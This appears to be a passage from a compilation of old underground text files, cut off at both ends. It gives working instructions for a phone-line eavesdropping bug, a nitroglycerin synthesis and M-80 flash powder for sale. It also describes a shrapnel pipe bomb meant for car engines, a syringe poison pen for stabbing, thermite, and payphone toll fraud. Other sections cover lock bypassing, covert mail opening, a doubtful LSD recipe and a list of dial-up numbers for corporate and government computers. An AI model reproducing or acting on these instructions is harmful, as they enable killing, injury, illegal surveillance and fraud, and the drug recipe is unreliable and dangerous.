legal. This is explained later in part 15... "no person shall use such a device for eavesdropping unless authorized by all parties of the conversation" (then it's not eavesdropping is it?). What this thing does, is use four diodes to form a "bridge rectifier". It produces a varying dc voltage varying with the auto-signals on the line. That voltage is used to supply the the voltage for the oscillator transistor. Which is connected to a radio circuit. From there, you can tune it to any channel you want. The rest will all be explained in a minute....  73 PARTS LIST item description ----------------------------------------------------------------- C1 47-Pf ceramic disk capacitor C2,C3 27-Pf mica capacitor CR1,CR2,CR3,CR4 germanium diode 1n90 or equivalent R1 100 ohm, 1/4 watt 10% composition resistor R2 10k, 1/4 watt 10% composition resistor R3 .7k, 1/4 watt 10% composition resistor L1 2 uH radio frequency choke (see text) L2 5 turns No.20 wire (see text) Q1 Npn rf transistor 2N5179 or equivalent ----------------------------------------------------------------- L1 may be constructed by winding approximately 40 turns of No. 36 enamel wire on a mega-ohm, 1/2 watt resistor. The value of L1 is not critical. L2 can be made by wrapping 5 turns of No. 20 wire around a 1/4 inch form. After the wire is wrapped, the form can be removed. Just solder it into place on the circuit board. It should hold quite nicely. Also be sure to position Q1 so that the emitter, base, and collector are in the proper holes. The schematic should be pretty easy to follow. Although it has an unusual number of grounds, it still works. ------------------L1---------------- -- CR1 / \ CR2 ---------------- A--------------/ \ -- ---- \ / C2 L2 CR3 \ /CR4 C1 R2 ---- R1 -- gnd C3 ---- ----- gnd ---------Base collector R3 \ / B----------------------- \/\ <- Q1 gnd \/ emitter(gnd) The odd thing about this bug that we haven't encountered yet, is that it is put on only one wire (either red or green) so go to the box, remove the red wire that was ALREADY on screw #1 and attach it to wire 'A' of the bug. Then attach wire 'B' to the screw itself. You can adjust the frequency which it comes out on the FM channel by either smooshing, or widening the coils of L2. It takes a few minutes to get to work right, but it is also very versatile. You can change the frequency at will, and you can easily record off your radio. PART FIVE: HELPFUL HINTS 73  First of all, With method one, the beige box, you may notice that you can also dial out on the phone you use. I don't recommend that you do this. If you decide to anyway, and do something conspicuous like set up a 30 person conference for three hours, then I suggest that you make sure the people are either out of town or dead. In general, when you tap a line, you must be careful. I test everything I make on my line first, then install it late at night. I would not recommend that you leave a recorder on all day. Put it on when you want it going, and take it off when you're done. As far as recording goes, I think that if there is a recorder on the line it sends a sporadic beep back to the phone co. I know that if you don't record directly off the line (i.e off your radio) then even the most sophisticated equipment can't tell that you're recording. Also, make sure that when you install something, the people are NOT on the line. Installation tends to make lots of scratchy sounds, clicks and static. It is generally a good thing to avoid. It doesn't take too much intelligence to just make a call to the house before you go to install the thing. If it's busy then wait a while. (This of course does not apply if you are making a "midnight run"). All in all, if you use common sense, and are *VERY* careful, chances are you won't get caught. Never think that you're unstoppable, and don't broadcast what you're doing. Keep it to yourself, and you can have a great time. Miracle Lock Picking While the basic themes of lockpicking and uninvited entry have not changed too much in the last few years, some modern devices and techniques HAVE appeared on the scene... AUTOS Many older autos can still be opened by easily with a SLIM JIM type opener (these and other auto locksmithing techniques are covered fully in the book, IN THE STEAL OF THE NIGHT. Look for it at the next gun-show in your town.); however, many modern cars have built covers over the lock mechanism, or have moved the goodies so the Slim Jim will not function... So... AMERICAN LOCKSMITH SERVICE P.O. Box 26 Culver City, CA 90230 Carries a new and improved Slim Jim that is 30" long and only 3/4" wide so it will both reach and slip through the new car lock covers. Price is $5.75 plus $2.00 postage and handling. General Motors cars have always been a bane to people who needed to open them, because the sidebar locking unit they employ is very difficult to pick. To further complicate matters, the new GM cars do employ metal shields to make the use of a Slim Jim type instrument very difficult... So... 73  LOCK TECHNOLOGY CORP. 685 Main St. New Rochelle, NY 10801 Offers a cute little gizmo which will easily remove the lock cylinder without harm and let you enter and/or start the vehicle. GMC-40 sells for $56.00 plus $2.00 postage and handling. The best general automobile opening kit is probably the set of lockout tools offered by: STECK MFG COPR. 1319 W Stewart St. Dayton, OH 45408 For $29.95 one can purchase a complete set of 6 carbon steel lockout tools that will open 95%+ of the cars around. Kwikset locks have become quite popular as one-step-up security locks for buildings. They are a bit harder to pick and do offer a higher degree of privacy than a normal, builder installed, door lock. So... Kwikset locks can be handily disassembled and the door opened, without harm to either the lock or the door, by using a KIWK-OUT tool sold by: A MFG 1151 Wallace SE Massilon, OH 44646 Price is $11.95, but if you are too lazy to pick auto locks... VEEHOF SUPPLY Box 361 Storm Lake, IO 50588 Still sells tryout keys for most cars. Price averages about $20.00 a set. Updated Lock Picking: For years, there have been a number of pick attack procedures for most pin and disc tumbler lock systems. In reverse order of ease they are: Normal picking: Using a pick set to align the pins, one by one, until the shear line is set and lock opens. Raking: This method uses picks that are constructed wth a series of bumps, or diamond shaped notches. these picks are "raked", i.e., run over all pins at one time. With luck, the pins will raise into the open position and stay there. Raking, if successful, can be much less effort than standard picking is. Lock Aid Gun: This gun shaped device was invented a number of years ago and has found applicatin with many locksmiths and security personnel. Basically, 73 a needle shaped pick is inserted in the snout of the "gun" and the "trigger" is pulled. This action snaps the pick up and down strongly. If the tip is slipped under the pins, they will also be snapped up and down strongly. With a bit of luck, they will strike each other and separate at the shear line for a split second. When this happens the lock will open. The Lock Aid gun is not 100% successful, but when it does work, the results are quite dramatic. I have opened locks with one snap of the trigger, impressing the hell out of casual bystanders.... Vibrator: Some crafty people have mounted a needle pick onto an electric toothbrush power unit. This vibrating effect will sometimes open pin tumbler locks; like instantly... Technology to the rescue! There is now another method to open pin and wafer locks in a very short time. Although it resembles the toothbrush pick in appearance, it is actually and electronic device. I am speaking of the COBRA PICK. Designed and sold by: FEDCORP P.O. Box 569 Scottsdale, AZ 85252 The Cobra uses two 9-volt batteries, teflon bearings (for less noise) and a cam-roller. It comes with three picks (for different types of locks) and works both in America and overseas on pin or wafer locks. It will open common door type locks in 3 to 7 seconds with no damage (in the hands of an experienced locksmith). It can take a few seconds more, or even half a minute in the hands of someone with no experience. How much for this toy that will open most locks in 7 seconds? $235 plus $4.50 handling. If none of these cute, safe and sane ideas appeal to you, you can always fall back on the magic thermal lance... The thermal lance is a rather crude instrument constructed from 3/8" hollow magnesium rods. Each "tube" comes in a 10" length, but can be cut down if desired. Each one is threaded on one end. To use the lance, you screw the tube together with a mated regulator (like a welding outfit uses) and hook up an oxygen tank. the oxygen is turned on and the hollwo rod is lit with a welding igniter. The device produces an incredible amount of heat. It is used for cutting up concrete blocks or even rocks. An active lance will go through a foot of steel in a few seconds. The lance, also known as a burning bar, is available from: C.O.L. MFG 7748 W Addison Chicago, IL 60634  73  ==================== = MAKING LSD = ==================== LSD, being of the strangest drugs, is available to people on the black market, is not too hard to make in your average run-of-the-mill kitchen. LSD (LySergic acid Diethylamide) is a complex organic mixture that gives some people (most) ================================ Making LSD: ITEMS NEEDED: 1-About 200-250 grams of MORNIGLOR SEEDS or BAY HAWAIIAN OOD ROSE SEEDS. The Morning Glory Seeds can be obtained at most plant nurseries. 2-200 cc. of petroleum ether 3-Small piece of window screen or a strainer. 4-A couple of large glasses. 5-One cookie try (old on to never be used again). 6-260 cc. of wood alcohol (call your local drug store). 7-Capsule containers (jel) ================================ Lets get started: 1. Grind up about 170 grams of Morning Glory Seeds. 2. In 145 cc of petroleum ether, soak the seeds for two or three days. 3. With screen, filter the liquid thru it and save the seed mush and allow it to dry completely. 4. Let the mush soak in 130 cc. of wood alcohol. 5. Filter solution again only. Save the liquid in a large glass jar. 6. Soak the seed mush again in 130 cc. of wood alcohol for two more days. 7. Filter out the mush and keep the liquid. Now, get the liquid that was saved in step 5. 8. Now, pour both liquids in a cookie tray and let it dry. 9. When all the liquid has dried, a yellowish gummy looking substance will appear on the cookie sheet. 10. Take the yellow gum and put these in to capsules. ================================ You can get the capsules just by buying something like DEXITREM or some other pill. Even CONTACT comes in jel capsules. Just empty them out and put the yellow gum in the capsules. Allow the capsules to sit over night for best results. 1 Trip: 34 Grams of morning glory 18 Grams of hawaiian wood ================================ How to open your own M-80 Factory ********** *Supplies* ********** Chicago Paper Tube. Phone # 1-312-666-1404. You will be getting the paper tubes from here. Order tubes that are 1/2" in diameter by 1 1/2" long with a 1/16" wall with RED outer wrap. 73  Paper Products. 1310 5th St., Tempe, AZ. 85281. Order 1/2" diameter paper end plugs. Write to them for prices. REMEMBER: for every 100 paper tubes you order, you must order 200 paper end plugs. Midwest Fireworks. 8550 RT. 224,Deerfield,OH. 44411. Phone 1-800-321-2400. Order one roll of 1/8" water proof fuse. Each M-80 needs a 2" fuse, so for every 100 paper tubes you order, you should have 17' of water proof fuse. Barium Chemicals Inc.,P.O. Box 218,County Rd. 44, Steubenville, OH. 43952. Phone 1-614-282-9776. Order Potassium Perchlorate. Order 2 pounds for every 250 paper tubes you order. Alcan Metal Powder Div.,P.O. Box 290, Elizabeth,NJ 07207. Phone 1-201-353- 4600. Order #AL-105 Aluminum Powder. Order 1 pound for every 250 paper tubes you order. Buy 1 gallon of Elmers glue from a hardware store or lumber yard. ********** *Assembly* ********** 1. Put 1 drop of glue on the inside of one end of the tube and insert the paper end plug. 2. Punch or drill a 1/8" hole in the side of the paper tube. 3. Cut the fuse you purchased into 2" long pieces. 4. Insert the fuse into the hole in the paper tube and glue in place. 5. Scoop the paper tube with the fuse into a container of flash powder. The paper tube should be about 2/3 full. 6. Put glue on the end plug and insert it into the paper tube filled with flash powder. 7. The completed M-80 firecracker should dry and the glue will become hard in 30-45 minutes. ********************** *Flash Powder Formula* ********************** Sensitive to friction and impact. High Explosive! Potassium Perchlorate 2 lbs. Aluminum Powder 1 lb. There must be a 2 to 1 ratio of Potassium Perchlorate to Aluminum Powder in order for the flash powder to be good. It must also be mixed well. Suggested Price for the M-80's You can make up your own price,but here are some prices. 73  2 for $1.00 11 for $5.00 24 for $10.00 50 for $20.00 100 for $40.00 ============ MAIL SECRETS ============ There is a little secret coding or gimmickry on U.S. mail. All U.S. postage stamps have an invisible ink coding that flouresces in ultraviolet light. Partly this is to detere counterfeiting of stamps. Mostly, it is to speed up sorting. Canceling machines shine an ultraviolet beam on letters and check for a glow. Calcium silicate (which glows orange-red) and zinc orthosilicate (which glows yellow-green) are used. They are printed over the entire surface of stamps or in a geometric pattern. Personal letters to the U.S. President have a secret numerical code. The president often gets 10,000 letters a day. Virtually all must be opened, read, and answered by the White House mail staff. So that letters from friends get to the president and family unopened, all close friends are given a sequence of numbers to write on the outside of the envelope. The code changes with each president. Ronald Reagan's code was described as a number with a special meaning to Reagan and his wife. Jimmy Carter used an old phone number of Rosalynn's. --------- WAX SEALS --------- Wax seals are not a guarantee against unauthorized opening of a letter. According to the CIA Flaps and Seals Manual, edited by John M. Harrison (Boulder, Colo.: Paladin Press, 1975), there is a way to remove and replace seals. First the opener takes a plaster-of-paris cast of the seal. This is set aside to harden. The wax is gently heated with an infrared lamp. When soft, it is rolled into a ball and set aside. The flap of the envelope is steamed open, and the letter is taken outand photocopied. After the envelope's contents and replaced and the flap resealed, the same wax is used to re-create the seal. It is heated till pliable and pressed back into shape with the plaster-of-paris mold. One type of seal is secure, even according to CIA Flaps And Seals Manual: one made of two or more colors of wax melted together. The colors inevitably come out different on the second, surreptitious pressing. But a color Polaroid of the seal must be sent under seperate cover so that the letter's recipient can compare it wiht the seal on the message letter. None of the common seals are reliable against unauthorized opening, assuming that knowledgeable letter-openers may want to open your mail. Scoth tape across the flap of an envelpoe come of cleany with carbon tetrachloride (applied with a brush or a hypodermic needle). If you suspect that someone is 73 opening your mail, the manual suggests sending yourself a letter containing a sheet of carbon or wax paper. The heat and mechanical treatment of the letter opening will smudge the carbon and melt the wax. Otherwise, you have to examine letters carefully to detect prior opening. A torn flap, smudging of the flap glue, flattened ridges in the flap, or concave (from the back) curling due to steaming are evidence of opening. A more sophisticated test requires steaming part of the envelope near the flap for fifteen seconds. Then place the envelope under an ultraviolet lamp. If there is a difference in flourescence between the steamed and the unsteamed part of the envelope, then the envelope paper is suitable for the test. If so, examine the unsteamed part of the flap under the ultraviolet lamp. If it shows a different flourescence than the other unsteamed parts of the envelope, it indicates that the flap may have been previously steamed. The ultraviolet lamp is also useful in detecting invisible writing. An effective ultraviolet ink need not flouresce brightly, as the silicate stamps inks do. Any substance that changes the flourescence of paper in ultraviolet light yet is invisible in ordinary light will work. Prisoners have used human urine as an invisible ink (not hard to get, ehh?). Salt water, vinegar, milk, fruit juices, saliva, and water solutions of soap or drugs also work, with varying degrees of legibility. --------------------------- HOW TO MAIL WITHOUT A STAMP --------------------------- Postal chiselers used to mail letters unstamped in the knowledge that they would be delievered anyway--postage due to the recipient. It took a niggardly person to mail personal letters this way, but many people did it on bill payments. So the post office changed its policy. It stopped delivering letters without stamps. A letter with a stamp--even a one-cent stamp--is delivered (postage due if need be). A letter with no stamp is returned to the sender. Naturally, this had just opened up a new way of cheating. Letters can now be maileed for free by switching the positions of the delivery address and the return address. If there is no stamp on the envelope, it will be "returned"-- that is, delivered to the address in the upper left corner--which is where the sender wanted it to go in the first place. Unlike under the old system, the letter is not postage-due. At most the recipient gets a stamped purple reminder that "the post office does not deliver mail without postage." At least one large company seems to have adapted this principle to its billing. Citibank bases its MasterCard operations in Sioux Falls, South Dakota. The bill payment envelopes have the Citibank Sioux Falls address in both the delivery address and the return address positions. (Most bill payment envelopes have three lines for the customer to write in his return address.) Therefore, regardless of whether the customer puts a stamp on the envelope, it is delivered to Citibank. (The return-address gimmick works even when the return address is in a different state from the mailing point.) Who is cheating whom? If the customer puts the correct postage on the envelope, it is delivered to Sioux Falls at customer expense. No one is 73 slighted. If, on the other hand, the customer intentionally omits the stamp, the payment is delivered at the post office expense. Then the customer has cheated the post office. The post office also loses out if the customer honestly forgets to put a stamp on the envelope. But the blame ought to be shared with the peculiar design of Citibank's envelope. Citibank's motive is plain: If payment envelopes are returned to forgetful customers, it delays payment. **** MAINFRAMES & MISC. **** THE FOLLOWING IS A LIST OF NUMBERS I HAVE COMPILED THROUGH A PERIOD OF TIME. NOTE THAT SOME OF THE NUMBERS LISTED ARE NOT OF MAINFRAME NATURE BUT RATHER A SMALLER TYPE SYSTEM. 312-972-7603 ARROGON NET LAB 800-228-1111 AMERICAN EXPRESS 215-564-6572 ATLANTIC CITY CASINO 800-225-8456 AUTONET 800-327-676 313-234-5621 FTS 213-798-2000 FTS 202-347-3222 F.A.A. 817-332-8491 FORTWORTH SCHOOL 817-625-6401 GIS 617-732-1251 HARVARD 617-732-1802 " 415-857-8193 HP3000 303-232-8555 HP3000 313-644-3840 HIGH SCHOOL 714-962-3365 H.A.T.S. 215-563-9213 HP3000 512-385-4170 HP3000 301-881-6156 HP3000 301-881-6157 HP3000 301-881-6158 HP3000SION 609-734-3131 RCA/CMS 414-476-8010 RSTS/E 414-542-4494 " 414-543-0789 " 303-447-2540 " 817-877-0548 " 313-964-2064 SMITH & HENCHMAN 315-423-1313 SYRACUSE DECS 404-885-3460 SEARS CREDIT CHECK 212-369-5114 SPENCE SCHOOL 713-795-1200 SHELL VULCAN 313-964-2000 SEMAT COMPUTER 412-794-7601 SLIPPERY ROCK OIL 800-424-9494 TELEMAIL 714-776-4511 TRW 73  THE FOLLOWING IS A LIST OF NUMBERS I HAVE COMPILED THROUGH A PERIOD OF TIME. NOTE THAT SOME OF THE NUMBERS LISTED ARE NOT OF MAINFRAME NATURE BUT RATHER A SMALLER TYPE SYSTEM. 312-972-7603 ARROGON NET LAB 800-228-1111 AMERICAN EXPRESS 215-564-6572 ATLANTIC CITY CASINO 800-225-8456 AUTONET 800-327-676 313-234-5621 FTS 213-798-2000 FTS 202-347-3222 F.A.A. 817-332-8491 FORTWORTH SCHOOL 817-625-6401 GIS 617-732-1251 HARVARD 617-732-1802 " 415-857-8193 HP3000 303-232-8555 HP3000 313-644-3840 HIGH SCHOOL 714-962-3365 H.A.T.S. 215-563-9213 HP3000 512-385-4170 HP3000 301-881-6156 HP3000 301-881-6157 HP3000 301-881-6158 HP3000SION 609-734-3131 RCA/CMS 414-476-8010 RSTS/E 414-542-4494 " 414-543-0789 " 303-447-2540 " 817-877-0548 " 313-964-2064 SMITH & HENCHMAN 315-423-1313 SYRACUSE DECS 404-885-3460 SEARS CREDIT CHECK 212-369-5114 SPENCE SCHOOL 713-795-1200 SHELL VULCAN 313-964-2000 SEMAT COMPUTER 412-794-7601 SLIPPERY ROCK OIL 800-424-9494 TELEMAIL 714-776-4511 TRW How to Make Nitroglycerin CH2ONO2 ! 3/2 N2 + 3 CO2 CHONO2 ----------> + ! Ignition 5/2 H2O + 1/4 O2 CH2ONO2 73  (How Nitro explodes--note that the byproducts are nothing but nitrogen, carbon dioxide, water and oxygen) Nitroglycerin [heretofore Nitro] is a very high-explosive. I am not sure who invented it but he porbably didn't-- the first preson to make it blew himself up and his friend got the info off his notes. Well anyway, the next best thing to nitro is TNT which is ten times harder to make but also ten times safer to make. If you can't use common sense then don't even try to make this stuff-- a few drops can be lethal under certain circumstances. To make Nitro: -------------- Mix 100 parts fuming nitric acid(for best results it should have a specific gravity of 50 degrees Baume') with 200 parts sulphuric acid. This is going to be hot at first--it won't splatter if you pour the nitric into the sulphuric but don't try it the other way around. The acid solutions together can dissolve flesh in a matter of seconds so take the proper measures for God's sake!!! When cool, add 38 parts glycerine as slowly as possible. Let it trickle down the sides of the container into the acids or it won't mix thourily and the reaction could go fast--which causes heat to ignite the stuff. Stir with a **GLASS** rod for about 15 seconds or so then **CAREFULLY** pour it into 20 times it's **VOLUME** of water. It will visibly precipate immediatly. There will be twice as much Nitro as you used glycerin and it is easy to seperate. Mix it with baking soda as soon as you have seperated it-- this helps it not to go off spontainously. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: NOTES: Parts are by weight and the Baume' scale of specific gravity can be found in most chem. books. You can get fuming nitric and sulfuric acid where ever goo chemical or fertilizers are sold. It is positivly *STUPID* to make more than 200 grams of Nitro at a time. When mixing the stuff wear goggles, gloves, etc. When I first made the stuff I had the honor of having it go off by itself (I added too much glycerin at a time). I was across the room at the time, but I felt the impact-- so did the table it was on as well as the window it was next to--they were both smashed by only 25 grams in an open bowl. Oh yes, glycerine you can get at any pharmacy and you need an adults sigature for the acids. Any bump can make Nitro go off if you don't add the bicarbonate of (baking) soda-but even with that, if it gets old I wouldn't play catch with it. Once you have made the Nitro and saturated it with bicarb. you can make a really powerful explosive that won't go off by itself by simply mixing it with as much cotton as you can add and then saturating it that with molten parifine--just enough to make it sealed and hard. Typically use the same amounts (by weight) of each Nitro, cotton, and parifine. This when wrapped in newspaper, was once known as "Norbin & Ohlsson's Patent Dynamite," but that was back in 1896.  73 Modem Noise Killer (alpha version) With this circuit diagram, some basic tools including a soldering iron, and four or five components from Radio Shack, you should be able to cut the noise/garbage that appears on your computer's screen. I started this project out of frustration at using a US Robotics 2400 baud modem and getting a fare amount of junk when connecting at that speed. Knowing that capacitors make good noise filters, I threw this together. This is very easy to build, however conditions may be different due to modem type, amount of line noise, old or new switching equipment (Bell's equipment), and on and on. So it may not work as well for you in every case. If it does work, or if you've managed to tweek it to your computer/modem setup I' d like to hear from you. I'd also appreciate any of you electronic wizzards out there wanting to offer any improvements. Let's make this work for everyone! Please read this entire message and see if you understand it before you begin. OK, what you' ll need from Radio Shack: 1 #279-374 Modular line cord if you don't already have one. You won't need one if your phone has a modular plug in its base. $4.95 1 #279-420 Modular surface mount jack (4 or 6 conductor) $4.49 1 #271-1720 Potentiometer. This is a 5k audio taper variable resistor. $1.09 1 #272-1055 Capacitor. Any non-polarized 1.0 to 1.5 uf cap should do. Paper, Mylar, or metal film caps should be used, although #272-996 may work as well. (272-996 is a non-polarized electrolytic cap) $.79 1 100 ohm resistor - quarter or half watt. $.19 1 #279-357 Y-type or duplex modular connector. Don't buy this until you've read the section on connecting the Noise Killer below. (A, B,or C) $4.95 First off, open the modular block. You normally just pry them open with a screwdriver. Inside you'll find up to 6 wires. Very carefully cut out all but the green and red wires. The ones you'll be removing should be black, yellow, white, and blue. These wires won't be needed and may be in the way. So cut them as close to where they enter the plug as possible. The other end of these wires have a spade lug connector that is screwed into the plastic. Unscrew and remove that end of the wires as well. Now, you should have two wires left. Green and red. Solder one end of the capacitor to the green wire. Solder the other end of the capacitor to the center lug of the potentiometer (there are three lugs on this critter). Solder one end of the resistor to the red wire. You may want to shorten the leads of the resistor first. Solder the other end of the resistor to either one of the remaining outside lugs of the potentiometer. Doesn't matter which. Now to wrap it up, make a hole in the lid of the mod block to stick the shaft of the potentiometer through. Don't make this hole dead center as the other parts may not fit into the body of the mod block if you do. See how things will fit in order to find where the hole will go. Well, now that 73 you've got it built you'll need to test it. First twist the shaft on the potentiometer until it stops. You won't know which way to turn it until later. It doesn't matter which way now. You also need to determine where to plug the Noise Killer onto the telephone line. It can be done by one of several ways: A. If your modem has two modular plugs in back, connect the Noise Killer into one of them using a line cord. (a line cord is a straight cord that connects a phone to the wall outlet. Usually silver in color) B. If your phone is modular, you can unplug the cord from the back of it after you're on-line and plug the cord into the Noise Killer. C. You may have to buy a Y-type modular adaptor. Plug the adaptor into a wall outlet, plug the modem into one side and the Noise Killer into the other. Call a BBS that has known noise problems. After you've connected and garbage begins to appear, plug the Noise Killer into the phone line as described above. If you have turned the shaft on the potentiometer the wrong way you'll find out now. You may get a lot of garbage or even disconnected. If this happens, turn the shaft the other way until it stops and try again. If you don't notice much difference when you plug the Noise Killer in, that may be a good sign. Type in a few commands and look for garbage characters on the screen. If there still is, turn the shaft slowly until most of it is gone. If nothing seems to happen at all, turn the shaft slowly from one side to the other. You should get plenty of garbage or disconnected at some point. If you don't, reread this message to make sure you've connected it right. ***END OF ORIGNAL FILE*** ADDITION TO ORIGNAL FILE - 2/29/88 - Mike McCauley - CIS 71505,1173 First, a personal recomendation. _THIS WORKS!!!_ I have been plagued with noise at 2400 for some time. I went round and round with Ma Bell on it, and after they sent out several "repair persons" who were, to be kind, of limited help in the matter, I threw in the towel. I saw this file on a board up east a few days ago, and thought I'd bite. Threw the gismo together in about 10 minutes, took another five to adjust the pot for best results on my worst conection, and guess what? No more worst connecion! A few pointers: 1) The pot need not be either 5K or audio taper. I used a 10K 15 turn trim pot. Suggest you use what is handy. 2) I used 2MFD's of capacitance (two 1MFD's in parallel) Two R.S. p/n 272-1055 work fine. Remember that about 90 Volts will appear across red & green at ring, so the caps should be rated at 100VDC+. 3) I ended up with a final series resistance value (100 ohm + pot) of 2.75K. I speculate that one could probably use 2MFD and a fixed 2.7K resistor and do the job 90% of the time. The adjustment of the pot is not very critical. Changes of +/- 1K made little difference in the performance of the circuit. Hope it works as well for you as it did for me. Mike McCauley  73  How to "steal" local calls from most Payphones Now to make free local calls, you need a finishing nail. We highly recommend "6D E.G. FINISH C/H, 2 INCH" nails. These are about 3/32 of an inch in diameter and 2 inches long (of course). You also need a large size paper clip. By large we mean they are about 2 inches long (FOLDED). Then you unfold the paper clip. Unfold it by taking each piece and moving it out 90 degrees. When it is done it should look somewhat like this: /----------\ : : : : : : : : \----- Now, on to the neat stuff. What you do, instead of unscrewing the glued-on mouthpiece, is insert the nail into the center hole of the mouthpiece (where you talk) and push it in with pressure or just hammer it in by hitting the nail on something. Just DON'T KILL THE MOUTHPIECE! You could damage it if you insert the nail too far or at some weird angle. If this happens then the other party won't be able to hear what you say. You now have a hole in the mouthpiece in which you can easily insert the paper clip. So, take out the nail and put in the paper clip. Then take the other end of the paper clip and shove it under the rubber cord protector at the bottom of the handset (you know, the blue guy...). This should end up looking remotely like...like this: /----------\ Mouthpiece : : / Paper clip --> : : / : /---:---\ : : : :------------> ====================\---))): : To earpiece -> ^ ^ \--------------------> : : : : Cord Blue guy (The paper clip is shoved under the blue guy to make a good connection between the inside of the mouthpiece and the metal cord.) Now, dial the number of a local number you wish to call, sayyyy, MCI. If everything goes okay, it should ring and not answer with the "The Call You Have Made Requires a 20 Cent Deposit" recording. After the other end answers the phone, remove the paper clip. It's all that simple, see? There are a couple problems, however. One is, as we mentioned earlier, the mouthpiece not working after you punch it. If this happens to you, simply move on to the next payphone. The one you are now on is lost. Another problem is that the touch tones won't work when the paper clip is in the mouthpiece. There are two ways around this.. A> Dial the first 6 numbers. This should be done without the paper 73 clip making the connection, i.e., one side should not be connected. Then connect the paper clip, hold down the last digit, and slowly pull the paper clip out at the mouthpiece's end. B> Don't use the paper clip at all. Keep the nail in after you punch it. Dial the first 6 digits. Before dialing the last digit, touch the nail head to the plate on the main body of the phone, the money safe thingy..then press the last number. The reason that this method is sometimes called clear boxing is because there is another type of phone which lets you actually make the call and listen to them say "Hello, hello?" but it cuts off the mouthpiece so they can't hear you. The Clear Box is used on that to amplify your voice signals and send it through the earpiece. If you see how this is even slightly similar to the method we just described up there, kindly explain it to US!! Cause WE don't GET IT! Anyways, this DOES work on almost all single slot, Dial Tone First payphones (Pacific Bell for sure). We do it all the time. This is the least, WE STRESS *LEAST*, risky form of Phreaking. And remember. There are other Phreaks like you out there who have read this article and punch payphones, so look before you punch, and save time. - HOW TO MAKE A POWERFUL PIPE BOMB - This pipe bomb is extremely powerful and should be used with extreme caution. This bomb is very nice and EXTREMELY powerful, though. It packs quite a punch, especially nestled on someone's engine block. Ingredients: 1. A PVC pipe. The longer, the more powerful. I recommend about 5 inches. 2. Two ends, preferably brass. These are the things that screw on to the end of the pipe. 3. Black powder - gun powder. 4. A drill. 5. Cannon Fuse, 6+ inches long. * 6. Iron bits and pieces. * denotes optional. Instructions: Use the drill to make a hole in the middle of the PVC pipe, a hole as big as the width of the fuse. Put one end on one end of the pipe, tighten it nicely 73  and then pour as much black powder in there as will fit. Now securely fasten the other end on the other side and insert the fuse. Place, light, and run! Options: Bury the bomb about six inches underground and light. I once did this and it sent debris 20 feet in every direction. Place on the engine block of car to destroy it. Try electric detonation with an electric match. Put iron bits in the black powder to make it lethal. Remember: If this is used correctly it can be as powerful as a hand grenade. Also, light this in the correct place or else it could make your life miserable. Poison Pen Need: plastic retractable ball pt. pen 1cc Tuberculin syringe (about .7cm diam. or 1/4in) (needle:1cm or 3/8 in. long) razor blades ruler To make: Cut about 1/4 in. or .7cm off end of syringe tube. Generally make the tube streamlined. Take insides out of pen. Sheer off tip of pen until you can push the syringe in with light pressure and have all the needle, but nothing else, protruding from the tip. Cut a mark in the syringe where pen meets syringe. Remove syringe. Screw the sides of the pen together. Cut pen in two at meeting place of two halves. Take the moving parts of the pen ( the 'clicker') out. Cut off all protrusions (parts that look like the fins on a rocket) Glue all parts together like they were originally. That part will now be called the clicker. Cut the 'push' flat part off the top of the plunger. Cut the plunger so it is about 3/8 in. from the top of the tube when inserted all the way. Whittle the tip of the plunger so it will fit loosely in the clicker. Plunger end first, GENTLY push the tube into the clip-on end of the pen as far as it will go, with moderate pressure. Mark the place where pen meets tube. Remove the tube, measure the distance between the two marks, and cut that much off the end of the tube. Cut and whittle the plunger again. Place the clicker in the clip end. Insert the plunger to about .4cc and gently push into the clip end. You should be able to push the clicker and make the plunger move all the way down to empty. If not, modify further. Cut a piece of plastic or paper about 2cm or 7/8in wide, big enough to wrap around the biggest part of the pen. Tape it so it forms a sheath or tube and paint to match the pen, like a sheath to cover the gap between the ends when the pen is not armed. To Arm: Remove the syringe parts and fill with about .4cc liquid (good poison of course). Push the plunger end in the clip end as far as it will go. Some liquid should squirt out, which is okay, as long as there is .1-.2cc left. Take the other end of the pen and push it over the syringe and into the sheath. 73 You should place it so the needle is almost extending out of the end, but not quite. To use: One-handed, holding with the clip on part (not touching the clicker), slide the two ends together. The needle should slide out. Stab, depress clicker. The syringe should inject its poison. Chemicals 1 I. Common "weak" explosives. A. Gunpowder: 75% Potassium Nitrate 15% Charcoal 10% Sulfur The chemicals should be ground into a fine powder (seperately!) with a morter & pestle. If gunpowder is ignited in the open, it burns fiercely, but if in a closed space it builds up pressure from the released gases and can explode the container. Gunpowder works like this: the potassium nitrate oxidizes the charcoal and sulfur, which then burn fiercely. Carbon dioxide and sulfur dioxide are the gases released. B. Ammonal: Ammonal is a mixture of ammonium nitrate (a strong oxidizer) with aluminum powder (the 'fuel' in this case). I am not sure of the % composition for Ammonal, so you may want to experiment a little using small amounts. C. Chemically ignited explosives: 1. A mixture of 1 part potassium chlorate to 3 parts table sugar (sucrose) burns fiercely and brightly (similar to the burning of magnesium) when 1 drop of concentrated sulfuric acid is placed on it. What occurs is this: when the acid is added it reacts with the potassium chlorate to form chlorine dioxide, which explodes on formation, burning the sugar as well. 2. Using various chemicals, I have developed a mixture that works very well for imitating volcanic eruptions. I have given it the name 'MPG Volcanite' (tm). Here it is: potassium chlorate +potassium perchlorate + ammonium nitrate + ammonium dichromate + potassium nitrate + sugar + sulfur + iron filings + charcoal + zinc dust + some coloring agent. (scarlet= strontium nitrate, purple= iodine crystals, yellow= sodium chloride, crimson= calcium chloride, etc...). 3. So, do you think water puts out fires? In this one, it starts it. Mixture: ammonium nitrate + ammonium chloride + iodine + zinc dust. When a drop or two of water is added, the ammonium nitrate forms nitric acid which reacts with the zinc to produce hydrogen and heat. The heat vaporizes the iodine (giving off purple smoke) and the ammonium chloride (becomes purple when mixed with iodine vapor). It also may ignite the hydrogen and begin burning. Ammonium nitrate: 8 grams Ammonium choride: 1 gram Zinc dust: 8 grams Iodine crystals: 1 gram 4. Potassium permanganate + glycerine when mixed produces a purple-colored 73 flame in 30 secs-1 min. Works best if the potassium permanganate is finely ground. 5. Calcium carbide + water releases acetylene gas (highly flammable gas used in blow torches...) II. Thermite reaction. The Thermite reaction is used in welding, because it generates molten iron and temperatures of 3500 C (6000F+). It uses one of the previous reactions that I talked about to START it! Starter=potassium chlorate + sugar Main pt.= iron (III) oxide + aluminum powder (325 mesh or finer) Put the potassium chlorare + sugar around and on top of the main pt. To start the reaction, place one drop of concentrated sulfuric acid on top of the starter mixture. STEP BACK! The ratios are: 3 parts iron(III) oxide to 1 part aluminum powder to 1 part potassium chlorate to 1 part sugar. When you first do it, try 3g:1g:1g:1g! Also, there is an alternative starter for the Thermite reaction. The alternative is potassium 